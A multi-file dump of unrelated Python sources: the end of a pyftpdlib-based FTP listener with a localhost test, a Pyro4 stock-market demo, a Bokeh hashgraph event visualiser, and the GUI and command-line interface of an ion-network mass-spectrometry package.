self.handler.ftproot_path = self.ftproot_path
self.handler.abstracted_fs = FakeFS
self.handler.authorizer = self.authorizer
self.handler.passive_ports = self.expand_ports(self.config.get('pasvports', '60000-60010'))
self.server = ThreadedFTPServer((self.local_ip, int(self.config['port'])), self.handler)
# Override pyftpdlib logger name
logging.getLogger('pyftpdlib').name = self.name
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.close_all()
def genBanner(self):
bannerfactory = BannerFactory.BannerFactory()
return bannerfactory.genBanner(self.config, BANNERS)
###############################################################################
# Testing code
def test(config):
import ftplib
client = ftplib.FTP()
client.connect('localhost', int(config.get('port', 21)))
client.login('user', 'password')
client.dir('.')
client.close()
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '21', 'usessl': 'No', 'protocol': 'tcp', 'ftproot': os.path.join('..', 'defaultFiles')}
listener = FTPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main()
|
stockmarket.py | from __future__ import print_function
import random
import threading
import time
import Pyro4
class StockMarket(object):
def __init__(self, marketname, symbols):
self.name=marketname
self.symbolmeans={}
for symbol in symbols:
self.symbolmeans[symbol]=random.uniform(20,200)
self.aggregators=[]
def generate(self):
quotes={}
for symbol,mean in self.symbolmeans.items():
if random.random()<0.2:
quotes[symbol]=round(random.normalvariate(mean,20),2)
print("new quotes generated for",self.name)
for aggregator in self.aggregators:
aggregator.quotes(self.name, quotes)
def listener(self,aggregator):
print("market {0} adding new aggregator".format(self.name))
self.aggregators.append(aggregator)
def symbols(self):
return list(self.symbolmeans.keys())
def run(self):
def generate_symbols():
while True:
time.sleep(random.random())
self.generate()
thread=threading.Thread(target=generate_symbols)
thread.setDaemon(True)
thread.start()
def main():
nasdaq=StockMarket("NASDAQ", ["AAPL", "CSCO", "MSFT", "GOOG"])
newyork=StockMarket("NYSE", ["IBM", "HPQ", "BP"])
daemon=Pyro4.Daemon()
nasdaq_uri=daemon.register(nasdaq)
newyork_uri=daemon.register(newyork)
ns=Pyro4.locateNS()
ns.register("example.stockmarket.nasdaq",nasdaq_uri)
ns.register("example.stockmarket.newyork",newyork_uri)
nasdaq.run()
newyork.run()
print("Stockmarkets running.")
daemon.requestLoop()
if __name__ == "__main__":
main()
|
viz.py | # -*- coding: utf-8 -*-
import threading
from functools import partial
from time import sleep, strftime, gmtime
from bokeh.io import curdoc
from bokeh.layouts import row, column
from bokeh.models import (Button, TextInput, ColumnDataSource, PanTool, HoverTool, PreText, WheelZoomTool)
from bokeh.palettes import plasma, small_palettes
from bokeh.plotting import figure
from twisted.internet import threads, reactor
from tornado import gen
from bptc.data.event import Fame
from bptc.protocols.pull_protocol import PullClientFactory
R_COLORS = small_palettes['Set2'][8]
doc = curdoc()
I_COLORS = plasma(256)
ready_event = threading.Event()
ready_event.set()
class App:
def __init__(self):
self.pull_thread = None
self.pulling = False
if not reactor.running:
self.start_reactor_thread()
self.text = PreText(text='Restart the process to clear all events.',
width=500, height=100)
self.ip_text_input = TextInput(value='localhost')
self.port_text_input = TextInput(value='8001')
self.single_pull_button = Button(label="single pull", width=150)
self.single_pull_button.on_click(partial(self.single_pull, self.ip_text_input, self.port_text_input))
self.pulling_button = Button(label="start/stop pulling", width=150)
self.pulling_button.on_click(partial(self.toggle_pulling, self.ip_text_input, self.port_text_input))
self.all_events = {}
self.member_id_to_x = {}
self.n_nodes = 10
plot = figure(
plot_height=800, plot_width=1800, y_range=(0, 30), x_range=(0, self.n_nodes - 1),
tools=[PanTool(), # dimensions=[Dimensions.height, Dimensions.width]
HoverTool(tooltips=[
('id', '@id'), ('from', '@from'), ('height', '@height'), ('witness', '@witness'),
('round', '@round'), ('data', '@data'), ('famous', '@famous'),
('round_received', '@round_received'), ('consensus_timestamp', '@consensus_timestamp')])])
plot.add_tools(WheelZoomTool())
plot.xgrid.grid_line_color = None
plot.xaxis.minor_tick_line_color = None
plot.ygrid.grid_line_color = None
plot.yaxis.minor_tick_line_color = None
self.index_counter = 0
self.links_src = ColumnDataSource(data={'x0': [], 'y0': [], 'x1': [],
'y1': [], 'width': []})
self.links_rend = plot.segment(color='#777777',
x0='x0', y0='y0', x1='x1',
y1='y1', source=self.links_src, line_width='width')
self.events_src = ColumnDataSource(
data={'x': [], 'y': [], 'round_color': [], 'line_alpha': [],
'round': [], 'id': [], 'payload': [], 'time': [], 'from': [], 'height': [], 'data': [],
'witness': [], 'famous': [], 'round_received': [], 'consensus_timestamp': []})
self.events_rend = plot.circle(x='x', y='y', size=20, color='round_color',
line_alpha='line_alpha', source=self.events_src, line_width=5)
control_row = row(self.text, self.ip_text_input, self.port_text_input, self.single_pull_button,
self.pulling_button)
main_row = column([control_row, plot])
doc.add_root(main_row)
def single_pull(self, ip_text_input, port_text_input):
"""Trigger the reactor to pull from the specified client."""
ip = ip_text_input.value
port = int(port_text_input.value)
factory = PullClientFactory(self, doc, ready_event)
threads.blockingCallFromThread(reactor, partial(reactor.connectTCP, ip, port, factory))
def toggle_pulling(self, ip_text_input, port_text_input):
"""Start/stop a thread that frequently triggers the reactor to pull from the specified client."""
if self.pulling:
self.pull_thread.stop()
self.pulling = False
else:
ip = ip_text_input.value
port = int(port_text_input.value)
factory = PullClientFactory(self, doc, ready_event)
self.pull_thread = PullingThread(ip, port, factory)
self.pull_thread.daemon = True
self.pull_thread.start()
self.pulling = True
@gen.coroutine
def received_data_callback(self, from_member, events):
"""Called by the reactor when a Pull was successful. Process the received data."""
print('received_data_callback()')
patch = {}
new_events = []
for event in events:
if event.id in self.all_events:
# know event
if event.consensus_time is not None:
# not committed so far
if 'round_color' not in patch:
patch['round_color'] = []
patch['famous'] = []
patch['round_received'] = []
patch['consensus_timestamp'] = []
index = self.all_events[event.id].index
patch['round_color'].append((index, self.color_of(event)))
patch['famous'].append((index, self.fame_to_string(event.is_famous)))
patch['round_received'].append((index, event.round_received))
patch['consensus_timestamp'].append((index, event.consensus_time))
else:
# don't know event
if event.verify_key not in self.member_id_to_x.keys():
# don't know member
self.member_id_to_x[event.verify_key] = len(self.member_id_to_x)
event.index = len(self.all_events)
self.all_events[event.id] = event
new_events.append(event)
self.events_src.patch(patch)
events, links = self.extract_data(new_events)
self.links_src.stream(links)
self.events_src.stream(events)
print("Updated member {} at {}...\n".format(from_member[:6], strftime("%H:%M:%S", gmtime())))
ready_event.set()
def extract_data(self, events):
"""Extract the data out of the event list and adapt it for the use with Bokeh."""
events_data = {'x': [], 'y': [], 'round_color': [], 'line_alpha': [], 'round': [], 'id': [], 'payload': [],
'time': [], 'from': [], 'height': [], 'data': [], 'witness': [], 'famous': [],
'round_received': [], 'consensus_timestamp': []}
links_data = {'x0': [], 'y0': [], 'x1': [], 'y1': [], 'width': []}
for event in events:
x = self.member_id_to_x[event.verify_key]
y = event.height
events_data['x'].append(x)
events_data['y'].append(y)
events_data['round_color'].append(self.color_of(event))
events_data['round'].append(event.round)
events_data['id'].append(event.id[:6] + "...")
events_data['payload'].append("".format(event.data))
events_data['time'].append(event.time)
events_data['line_alpha'].append(1)
events_data['from'].append(event.verify_key[:6] + '...')
events_data['height'].append(event.height)
events_data['data'].append('None' if event.data is None else str(event.data))
events_data['witness'].append('Yes' if event.is_witness else 'No')
events_data['famous'].append(self.fame_to_string(event.is_famous))
events_data['round_received'].append(event.round_received)
events_data['consensus_timestamp'].append(event.consensus_time)
self_parent_id = event.parents.self_parent
if self_parent_id is not None and self_parent_id in self.all_events:
self_parent = self.all_events[self_parent_id]
links_data['x0'].append(x)
links_data['y0'].append(y)
links_data['x1'].append(str(self.member_id_to_x[self_parent.verify_key]))
links_data['y1'].append(self_parent.height)
links_data['width'].append(3)
other_parent_id = event.parents.other_parent
if other_parent_id is not None and other_parent_id in self.all_events:
other_parent = self.all_events[other_parent_id]
links_data['x0'].append(x)
links_data['y0'].append(y)
links_data['x1'].append(str(self.member_id_to_x[other_parent.verify_key]))
links_data['y1'].append(other_parent.height)
links_data['width'].append(1)
return events_data, links_data
@staticmethod
def color_of(event):
"""Return the color of the given event."""
if event.consensus_time is not None:
# confirmed
if event.data is not None:
# with data
color = '#FF8000' # orange
else:
# without data
color = '#000000' # black
else:
# not confirmed
if event.data is not None:
# with data
color = '#F7D358' # light orange
else:
# without data
color = '#A4A4A4' # grey
return color
@staticmethod
def fame_to_string(fame):
"""Convert the fame of an event to a string."""
if fame is Fame.UNDECIDED:
return 'UNDECIDED'
elif fame is Fame.FALSE:
return 'NO'
elif fame is Fame.TRUE:
return 'YES'
@staticmethod
def start_reactor_thread():
"""Start the reactor in a separate thread."""
def start_reactor():
reactor.run(installSignalHandlers=0)
thread = threading.Thread(target=start_reactor)
thread.daemon = True
thread.start()
print('Started reactor')
App()
class PullingThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, ip, port, factory):
super(PullingThread, self).__init__()
self.ip = ip
self.port = port
self.factory = factory
self._stop_event = threading.Event()
def run(self):
while not self.stopped():
ready_event.wait()
ready_event.clear()
print('Try to connect...')
threads.blockingCallFromThread(reactor, partial(reactor.connectTCP, self.ip, self.port, self.factory))
sleep(2.0)
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
|
interface.py | #!python
# builtin
import os
import threading
# external
import PySimpleGUI as sg
import click
# local
from ion_networks import ms_run_files
from ion_networks import ms_database
from ion_networks import ms_utils
from ion_networks import browser
def convert_data_formats_to_csvs(
input_path,
data_type,
output_directory,
parameter_file_name,
log_file_name,
threads=None
):
"""
Convert centroided MSMS data to a unified csv that can be read as an
ion-network.
Parameters
----------
input_path : iterable[str]
An iterable with file and/or folder names.
output_directory : str or None
If provided, all new files will be saved in this directory.
data_type : str
The data type of the input files. Options are:
'DDA'
'SONAR'
'HDMSE'
'SWIMDIA'
'DIAPASEF'
parameter_file_name : str or None
If provided, parameters will be read from this file.
log_file_name : str or None
If provided, all logs will be written to this file.
"""
if parameter_file_name is None:
parameter_file_name = ""
if parameter_file_name != "":
parameter_file_name = os.path.abspath(parameter_file_name)
if output_directory is None:
output_directory = ""
if output_directory != "":
output_directory = os.path.abspath(output_directory)
parameters = ms_utils.read_parameters_from_json_file(
file_name=parameter_file_name,
default="convert"
)
if threads is not None:
ms_utils.set_threads(threads)
# TODO: Proper parsing of empty log...?
if (log_file_name is None) or (log_file_name == ""):
log_file_name = parameters["log_file_name"]
if log_file_name == "":
log_file_name = output_directory
with ms_utils.open_logger(log_file_name) as logger:
logger.info(f"Converting to generic input csvs")
input_file_names = ms_utils.get_file_names_with_extension(
input_path,
extension=ms_utils.DATA_TYPE_FILE_EXTENSIONS[data_type]
)
file_count = len(input_file_names)
logger.info(
f"{file_count} input_file{'s' if file_count != 1 else ''}"
f": {input_file_names}"
)
logger.info(f"data_type: {data_type}")
logger.info(f"output_directory: {output_directory}")
logger.info(f"parameter_file_name: {parameter_file_name}")
logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
logger.info("")
if output_directory != "":
if not os.path.exists(output_directory):
os.makedirs(output_directory)
for input_file_name in sorted(input_file_names):
data = ms_utils.read_data_from_file(
data_type,
input_file_name,
)
file_name_base = os.path.basename(input_file_name)[
:-len(ms_utils.DATA_TYPE_FILE_EXTENSIONS[data_type])
]
if output_directory == "":
output_path = os.path.dirname(input_file_name)
else:
output_path = output_directory
output_file_name = os.path.join(
output_path,
f"{file_name_base}.inet.csv"
)
ms_utils.write_data_to_csv_file(data, output_file_name)
def create_ion_networks(
input_path,
output_directory,
parameter_file_name,
log_file_name,
threads=None
):
"""
Create ion-networks from unified csv files.
Parameters
----------
input_path : iterable[str]
An iterable with file and/or folder names.
output_directory : str or None
If provided, all new files will be saved in this directory.
parameter_file_name : str or None
If provided, parameters will be read from this file.
log_file_name : str or None
If provided, all logs will be written to this file.
"""
if parameter_file_name is None:
parameter_file_name = ""
if parameter_file_name != "":
parameter_file_name = os.path.abspath(parameter_file_name)
if output_directory is None:
output_directory = ""
if output_directory != "":
output_directory = os.path.abspath(output_directory)
parameters = ms_utils.read_parameters_from_json_file(
file_name=parameter_file_name,
default="create"
)
if threads is not None:
ms_utils.set_threads(threads)
# TODO: Proper parsing of empty log...?
if (log_file_name is None) or (log_file_name == ""):
log_file_name = parameters["log_file_name"]
if log_file_name == "":
log_file_name = output_directory
with ms_utils.open_logger(log_file_name) as logger:
logger.info(f"Creating ion-networks")
input_file_names = ms_utils.get_file_names_with_extension(
input_path,
".inet.csv"
)
file_count = len(input_file_names)
logger.info(
f"{file_count} input_file{'s' if file_count != 1 else ''}"
f": {input_file_names}"
)
logger.info(f"output_directory: {output_directory}")
logger.info(f"parameter_file_name: {parameter_file_name}")
logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
logger.info("")
for centroids_file_name in input_file_names:
local_file_name = os.path.basename(centroids_file_name)
if output_directory == "":
output_path = os.path.dirname(centroids_file_name)
else:
output_path = output_directory
ion_network_file_name = os.path.join(
output_path,
f"{local_file_name[:-9]}.inet.hdf"
)
network = ms_run_files.HDF_Network_File(
ion_network_file_name,
new_file=True
)
network.create(
centroids_file_name=centroids_file_name,
parameters=parameters
)
def evidence_ion_networks(
input_path,
parameter_file_name,
log_file_name,
threads=None
):
"""
Evidence ion-networks with each other.
Parameters
----------
input_path : iterable[str]
An iterable with file and/or folder names.
parameter_file_name : str or None
If provided, parameters will be read from this file.
log_file_name : str or None
If provided, all logs will be written to this file.
"""
if parameter_file_name is None:
parameter_file_name = ""
if parameter_file_name != "":
parameter_file_name = os.path.abspath(parameter_file_name)
parameters = ms_utils.read_parameters_from_json_file(
file_name=parameter_file_name,
default="evidence"
)
if threads is not None:
ms_utils.set_threads(threads)
# TODO: Proper parsing of empty log...?
if (log_file_name is None) or (log_file_name == ""):
log_file_name = parameters["log_file_name"]
with ms_utils.open_logger(log_file_name) as logger:
logger.info(f"Evidencing ion-networks")
input_file_names = ms_utils.get_file_names_with_extension(
input_path,
".inet.hdf"
)
file_count = len(input_file_names)
logger.info(
f"{file_count} input_file{'s' if file_count != 1 else ''}"
f": {input_file_names}"
)
logger.info(f"parameter_file_name: {parameter_file_name}")
logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
logger.info("")
evidence_files = [
ms_run_files.HDF_Evidence_File(
file_name,
new_file=parameters["force_overwrite"],
is_read_only=False,
) for file_name in input_file_names
]
for index, evidence_file in enumerate(evidence_files[:-1]):
logger.info(f"Caching edges of {evidence_file.file_name}")
indptr, indices, pointers = evidence_file.ion_network.get_edges(
symmetric=True,
return_pointers=True
)
for secondary_evidence_file in evidence_files[index + 1:]:
evidence_file.align(
secondary_evidence_file,
parameters=parameters,
indptr=indptr,
indices=indices,
pointers=pointers,
)
del indptr, indices, pointers
def show_ion_network(
parameter_file_name,
log_file_name
):
# TODO: Docstring
# TODO: Implementation updates
if parameter_file_name is None:
parameter_file_name = ""
if parameter_file_name != "":
parameter_file_name = os.path.abspath(parameter_file_name)
parameters = ms_utils.read_parameters_from_json_file(
file_name=parameter_file_name,
)
# TODO: Proper parsing of empty log...?
if (log_file_name is None) or (log_file_name == ""):
log_file_name = parameters["log_file_name"]
with ms_utils.open_logger(log_file_name) as logger:
logger.info(f"Showing ion-networks")
logger.info("")
with browser.Browser() as browser_object:
browser_object.run()
def run_ion_network_gui():
# TODO: Docstring
with GUI() as gui:
gui.run()
def create_database(
input_path,
output_directory,
parameter_file_name,
log_file_name,
threads=None
):
# TODO: Docstring
if parameter_file_name is None:
parameter_file_name = ""
if parameter_file_name != "":
parameter_file_name = os.path.abspath(parameter_file_name)
if output_directory is None:
output_directory = ""
if output_directory != "":
output_directory = os.path.abspath(output_directory)
parameters = ms_utils.read_parameters_from_json_file(
file_name=parameter_file_name,
default="database"
)
if threads is not None:
ms_utils.set_threads(threads)
# TODO: Proper parsing of empty log...?
if (log_file_name is None) or (log_file_name == ""):
log_file_name = parameters["log_file_name"]
if log_file_name == "":
log_file_name = output_directory
# TODO: turn off ms2pip logger?
with ms_utils.open_logger(log_file_name) as logger:
logger.info(f"Creating database")
input_file_names = ms_utils.get_file_names_with_extension(
input_path,
extension=".fasta"
)
file_count = len(input_file_names)
logger.info(
f"{file_count} input_file{'s' if file_count != 1 else ''}"
f": {input_file_names}"
)
logger.info(f"output_directory: {output_directory}")
# TODO: Refer to default parameter file if necessary
logger.info(f"parameter_file_name: {parameter_file_name}")
logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
# TODO: include relevant individual parameters?
logger.info("")
base_name = "_".join(
[
".".join(
os.path.basename(fasta_file_name).split(".")[:-1]
) for fasta_file_name in input_file_names
]
)
database_file_name = os.path.join(output_directory, base_name)
if parameters["create_targets"]:
if parameters["create_decoys"]:
database_file_name = f"{database_file_name}_concatenated_decoy.hdf"
else:
database_file_name = f"{database_file_name}.hdf"
else:
database_file_name = f"{database_file_name}_decoy.hdf"
db = ms_database.HDF_Database_File(
database_file_name,
new_file=True,
)
db.create_from_fastas(input_file_names, parameters)
def annotate(
input_path,
database_file_name,
mgf_format,
parameter_file_name,
log_file_name,
threads=None,
fragment_ppm=None,
export_decoys=None,
fdr_filter=None,
align_to_database=None
):
# TODO: Docstring
if parameter_file_name is None:
parameter_file_name = ""
if parameter_file_name != "":
parameter_file_name = os.path.abspath(parameter_file_name)
database_file_name = os.path.abspath(database_file_name)
parameters = ms_utils.read_parameters_from_json_file(
file_name=parameter_file_name,
default="annotation"
)
if fragment_ppm is not None:
parameters["annotation_ppm"] = fragment_ppm
if export_decoys is not None:
parameters["export_decoys"] = export_decoys
if fdr_filter is not None:
parameters["fdr_filter"] = fdr_filter
if align_to_database is not None:
parameters["align_to_database"] = align_to_database
if threads is not None:
ms_utils.set_threads(threads)
# TODO: Proper parsing of empty log...?
if (log_file_name is None) or (log_file_name == ""):
log_file_name = parameters["log_file_name"]
with ms_utils.open_logger(log_file_name) as logger:
if mgf_format:
logger.info(f"Annotating mgf files")
input_file_names = ms_utils.get_file_names_with_extension(
input_path,
extension=".mgf"
)
else:
logger.info(f"Annotating ion-networks")
input_file_names = ms_utils.get_file_names_with_extension(
input_path,
extension=".evidence.hdf"
)
file_count = len(input_file_names)
logger.info(
f"{file_count} input_file{'s' if file_count != 1 else ''}"
f": {input_file_names}"
)
logger.info(f"database_file_name: {database_file_name}")
logger.info(f"parameter_file_name: {parameter_file_name}")
logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
logger.info(f"fragment_ppm: {parameters['annotation_ppm']}")
logger.info(f"fdr_filter: {parameters['fdr_filter']}")
logger.info(f"align_to_database: {align_to_database}")
# TODO implement fdr filtering!!!
logger.info(f"export_decoys: {parameters['export_decoys']}")
logger.info("")
database = ms_database.HDF_Database_File(database_file_name)
for file_name in input_file_names:
if mgf_format:
file_name_base = '.'.join(file_name.split('.')[:-1])
out_file_name = f"{file_name_base}.annotation.csv"
ms_utils.annotate_mgf(
file_name,
database,
out_file_name,
parameters,
)
else:
file_name_base = '.'.join(file_name.split('.')[:-2])
out_file_name = f"{file_name_base}.annotation.csv"
evidence = ms_run_files.HDF_Evidence_File(file_name)
evidence.annotate(database, out_file_name, parameters)
def create_mgfs(
input_path,
output_directory,
parameter_file_name,
log_file_name,
threads=None
):
"""
Create ion-networks from unified csv files.
Parameters
----------
input_path : iterable[str]
An iterable with file and/or folder names.
output_directory : str or None
If provided, all new files will be saved in this directory.
parameter_file_name : str or None
If provided, parameters will be read from this file.
log_file_name : str or None
If provided, all logs will be written to this file.
"""
if parameter_file_name is None:
parameter_file_name = ""
if parameter_file_name != "":
parameter_file_name = os.path.abspath(parameter_file_name)
if output_directory is None:
output_directory = ""
if output_directory != "":
output_directory = os.path.abspath(output_directory)
parameters = ms_utils.read_parameters_from_json_file(
file_name=parameter_file_name,
default="mgf"
)
if threads is not None:
ms_utils.set_threads(threads)
# TODO: Proper parsing of empty log...?
if (log_file_name is None) or (log_file_name == ""):
log_file_name = parameters["log_file_name"]
if log_file_name == "":
log_file_name = output_directory
with ms_utils.open_logger(log_file_name) as logger:
logger.info(f"Creating ion-networks")
input_file_names = ms_utils.get_file_names_with_extension(
input_path,
".evidence.hdf"
)
file_count = len(input_file_names)
logger.info(
f"{file_count} input_file{'s' if file_count != 1 else ''}"
f": {input_file_names}"
)
logger.info(f"output_directory: {output_directory}")
logger.info(f"parameter_file_name: {parameter_file_name}")
logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
logger.info("")
for input_file in input_file_names:
evidence = ms_run_files.HDF_Evidence_File(input_file)
evidence.create_mgf(parameters=parameters)
class GUI(object):
# TODO: Docstring
def __init__(
self,
start=False,
widget_size=20,
):
# TODO: Docstring
self.widget_size = widget_size
self.window = {}
self.evaluate_window = {}
update_message = ms_utils.verify_version()
if update_message != "":
sg.popup(
update_message,
title="Update available",
non_blocking=True
)
self.init_main_window()
self.init_convert_window()
self.init_create_window()
self.init_evidence_window()
self.init_terminal_window()
self.window["Main"] = sg.Window(
"Main",
self.window["Main"],
finalize=True
)
self.active_window_name = "Main"
if start:
self.run()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
for window in list(self.window.values()):
if not isinstance(window, list):
window.close()
def init_main_window(self):
# TODO: Docstring
self.window["Main"] = [
[sg.Button("Convert", size=(self.widget_size, 1))],
[sg.Button("Create", size=(self.widget_size, 1))],
[sg.Button("Evidence", size=(self.widget_size, 1))],
[sg.Button("Show", size=(self.widget_size, 1))],
]
self.evaluate_window["Main"] = self.evaluate_main_window
def init_convert_window(self):
# TODO: Docstring
default_data_type = "HDMSE"
self.window["Convert"] = [
[
sg.Text('Data type', size=(self.widget_size, 1)),
sg.Combo(
sorted(ms_utils.DATA_TYPE_FILE_EXTENSIONS),
default_value=default_data_type,
key="data_type",
size=(self.widget_size * 2, 1)
# enable_events=True
)
],
self.add_input_path_to_layout(
file_types=(
(
key,
f"*{value}"
) for key, value in sorted(
ms_utils.DATA_TYPE_FILE_EXTENSIONS.items()
)
),
# TODO: default_value=default_data_type,
),
self.add_output_directory_to_layout(),
self.add_parameter_file_to_layout(),
self.add_log_file_to_layout(),
self.add_main_menu_and_continue_buttons_to_layout()
]
self.evaluate_window["Convert"] = self.evaluate_convert_window
def init_create_window(self):
# TODO: Docstring
self.window["Create"] = [
self.add_input_path_to_layout(
file_types=(('Ion-networks', '*.inet.csv'),)
),
self.add_output_directory_to_layout(),
self.add_parameter_file_to_layout(),
self.add_log_file_to_layout(),
self.add_main_menu_and_continue_buttons_to_layout(),
]
self.evaluate_window["Create"] = self.evaluate_create_window
def init_evidence_window(self):
# TODO: Docstring
self.window["Evidence"] = [
self.add_input_path_to_layout(
file_types=(('Ion-networks', '*.inet.hdf'),)
),
self.add_parameter_file_to_layout(),
self.add_log_file_to_layout(),
self.add_main_menu_and_continue_buttons_to_layout(),
]
self.evaluate_window["Evidence"] = self.evaluate_evidence_window
def init_terminal_window(self):
# TODO: Docstring
self.window["Terminal"] = [
[sg.Output(size=(150, 50))],
self.add_main_menu_and_continue_buttons_to_layout(
continue_button=False
)
]
def evaluate_main_window(self, event, values):
# TODO: Docstring
if event == "Show":
self.swap_active_window("")
show_ion_network(
"",
""
)
self.swap_active_window("Main")
else:
self.swap_active_window(event)
def evaluate_convert_window(self, event, values):
# TODO: Docstring
if event == "Submit":
self.run_terminal_command(
convert_data_formats_to_csvs,
values["input_path"].split(";"),
values["data_type"],
values["output_directory"],
values["parameter_file_name"],
values["log_file_name"]
)
def evaluate_create_window(self, event, values):
# TODO: Docstring
if event == "Submit":
self.run_terminal_command(
create_ion_networks,
values["input_path"].split(";"),
values["output_directory"],
values["parameter_file_name"],
values["log_file_name"]
)
def evaluate_evidence_window(self, event, values):
# TODO: Docstring
if event == "Submit":
self.run_terminal_command(
evidence_ion_networks,
values["input_path"].split(";"),
values["parameter_file_name"],
values["log_file_name"]
)
def add_input_path_to_layout(
self,
file_types=(('ALL Files', '*.*'),),
title="Input path",
key="input_path",
multiple=True,
default_value=None,
):
# TODO: Docstring
# TODO: Multiple and independent files?
if multiple:
browse_button = sg.FilesBrowse(
size=(self.widget_size, 1),
file_types=file_types
)
else:
browse_button = sg.FileBrowse(
size=(self.widget_size, 1),
file_types=file_types,
# TODO: default file_type?
)
row = [
sg.Text(title, size=(self.widget_size, 1)),
sg.Input(
key=key,
size=(self.widget_size * 2, 1)
),
browse_button,
]
return row
def add_output_directory_to_layout(self):
# TODO: Docstring
row = [
sg.Text("Output directory", size=(self.widget_size, 1)),
sg.Input(
key="output_directory",
size=(self.widget_size * 2, 1)
),
sg.FolderBrowse(size=(self.widget_size, 1)),
]
return row
def add_parameter_file_to_layout(self, default=""):
# TODO: Docstring
row = [
sg.Text("Parameter file", size=(self.widget_size, 1)),
sg.Input(
key="parameter_file_name",
size=(self.widget_size * 2, 1),
default_text=default
),
sg.FileBrowse(
size=(self.widget_size, 1),
file_types=(('Parameter', '*.json'),)
),
]
return row
def add_log_file_to_layout(self, default=""):
# TODO: Docstring
# TODO: remove overwrite warning
# TODO: default log / empty log not parsed properly
row = [
sg.Text("Log file", size=(self.widget_size, 1)),
sg.Input(
key="log_file_name",
size=(self.widget_size * 2, 1),
default_text=default
),
sg.FileSaveAs(size=(self.widget_size, 1)),
]
return row
def add_main_menu_and_continue_buttons_to_layout(
self,
main_menu_button=True,
continue_button=True
):
# TODO: Docstring
row = []
if main_menu_button:
row.append(
sg.Button("Return to main menu", size=(self.widget_size, 1))
)
if continue_button:
row.append(sg.Button("Submit", size=(self.widget_size, 1)))
return row
def run(self):
# TODO: Docstring
while self.active_window_name is not None:
window = self.window[self.active_window_name]
event, values = window.read(timeout=10)
if event == sg.TIMEOUT_KEY:
continue
elif event is None:
self.active_window_name = None
elif event == "Return to main menu":
self.swap_active_window("Main")
else:
self.evaluate_window[self.active_window_name](event, values)
def run_terminal_command(self, command, *args):
# TODO: Docstring
self.swap_active_window("Terminal")
self.window["Terminal"].read(timeout=10)
self.window["Terminal"]["Return to main menu"].Update(
text="Executing, please wait",
disabled=True
)
thread = threading.Thread(target=command, args=args)
thread.start()
thread.deamon = True
while thread.isAlive():
event, values = self.window["Terminal"].read(timeout=10)
if event is None:
sg.Popup(
"WARNING, thread is still running in the background!",
title="WARNING",
button_color=("Black", "Red")
)
self.active_window_name = None
self.window["Terminal"]["Return to main menu"].Update(
text="Return to main menu",
disabled=False
)
def swap_active_window(self, new_window_name=""):
# TODO: Docstring, implement
if self.active_window_name != "":
self.window[self.active_window_name].Hide()
if new_window_name != "":
if isinstance(self.window[new_window_name], list):
self.window[new_window_name] = sg.Window(
new_window_name,
self.window[new_window_name],
finalize=True
)
self.window[new_window_name].UnHide()
self.active_window_name = new_window_name
class CLI(object):
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
def __init__(self):
print(ms_utils.verify_version())
# TODO: process update message
self.main.add_command(CLI.convert)
self.main.add_command(CLI.create)
self.main.add_command(CLI.evidence)
self.main.add_command(CLI.show)
self.main.add_command(CLI.gui)
self.main.add_command(CLI.database)
self.main.add_command(CLI.annotate)
self.main.add_command(CLI.mgf)
self.main()
@staticmethod
@click.group(
context_settings=CONTEXT_SETTINGS,
help="Analysis of LC-[...]-MSMS data with ion-networks."
)
def main():
pass
@staticmethod
@click.command(
"convert",
help="Convert [input.*] files with centroided ions to unified "
"[input.inet.csv] csv files.",
short_help="Convert various input formats to unified input."
)
@click.option(
"--input_path",
"-i",
help="An [input.*] file with centroided ion peaks that needs to be "
"converted to a unified [input.inet.csv] file. "
"Individual files can be provided, as well as folders. "
"This flag can be set multiple times.",
multiple=True,
required=True,
type=click.Path(exists=True)
)
@click.option(
'--data_type',
'-d',
help="The data type of the [input.*] file. If this is DDA, a [*.mgf] "
"file that was centroided with ms-convert is expected with the field "
"RTINSECONDS as LC coordinate. "
"For HDMSE, SONAR and SWIM-DIA, a [*_Apex3DIons.csv] generated with "
"Waters' Apex3d is expected, typically generated as follows "
"'Apex3D64.exe -pRawDirName sample.raw -outputDirName "
"peak_picked_sample_folder -lockMassZ2 785.8426 "
"-lockmassToleranceAMU 0.25 -bCSVOutput 1 -writeFuncCsvFiles 0 "
"-leThresholdCounts 1 -heThresholdCounts 1 -apexTrackSNRThreshold 1 "
"-bEnableCentroids 0'. "
"For DIAPASEF, a [*_centroided.hdf] file generated with diapasef.py "
"(https://github.com/swillems/diapasef) is expected.",
required=True,
type=click.Choice(
['DDA', 'HDMSE', "SONAR", "SWIMDIA", "DIAPASEF"],
case_sensitive=True
)
)
@click.option(
"--output_directory",
"-o",
help="For each [input.*] file, an [input.inet.csv] file is created. "
"If no output directory is provided, each [input.inet.csv] file is "
"placed in the same folder as its corresponding [input.*] file. "
"This output directory can also be supplied through a "
"[parameters.json] file. "
"WARNING: This overrides already existing files without "
"confirmation.",
type=click.Path(file_okay=False),
)
@click.option(
"--parameter_file",
"-p",
"parameter_file_name",
help="A [parameters.json] file with optional parameters.",
type=click.Path(exists=True, dir_okay=False),
)
@click.option(
"--log_file",
"-l",
"log_file_name",
help="Save the log to a [log.txt] file. "
"By default this is written to the current directory. "
"This log file can also be supplied through a [parameters.json] "
"file. It can be turned off by providing an empty path (i.e. ''). "
"If the log file already exists, the new log data is appended.",
type=click.Path(),
)
def convert(
input_path,
output_directory,
data_type,
parameter_file_name,
log_file_name
):
convert_data_formats_to_csvs(
input_path,
data_type,
output_directory,
parameter_file_name,
log_file_name
)
@staticmethod
@click.command(
"create",
help="Create [input.inet.hdf] ion-network files from unified "
"[input.inet.csv] files.",
short_help="Create ion-networks from unified input."
)
